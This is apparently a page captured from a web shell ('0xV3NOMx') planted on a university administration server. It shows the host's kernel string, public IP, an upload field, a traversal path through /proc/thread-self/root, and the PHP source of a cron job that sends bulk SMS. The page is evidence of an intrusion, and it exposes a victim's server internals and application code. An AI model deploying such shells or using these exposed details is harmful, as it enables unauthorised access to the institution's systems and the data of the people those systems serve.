0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.116.49.143


Current Path : /proc/thread-self/root/var/www/html/univadmin/
Upload File :
Current File : //proc/thread-self/root/var/www/html/univadmin/rcub_cronjob_sendsms.php

<?php

include ("database.php");
ini_set('display_errors', 'on');
include("../sms/sendsmsapiv1.php");
ini_set('memory_limit','900M');
ini_set('max_execution_time',900);

$univcode = '027';

if($univcode == '')
{
	die();
}
	
$univcode = $univcode;
$usertype = '900';
$fsentuser = 'CRON';

$sms1 = new SMS($univcode, "AB");
$sms1->sendCustomizedBulkSms($usertype, $fsentuser);

$sms2 = new SMS($univcode, "MP");
$sms2->sendCustomizedBulkSms($usertype, $fsentuser);

$sms3 = new SMS($univcode, "RA");
$sms3->sendCustomizedBulkSms($usertype, $fsentuser);

?>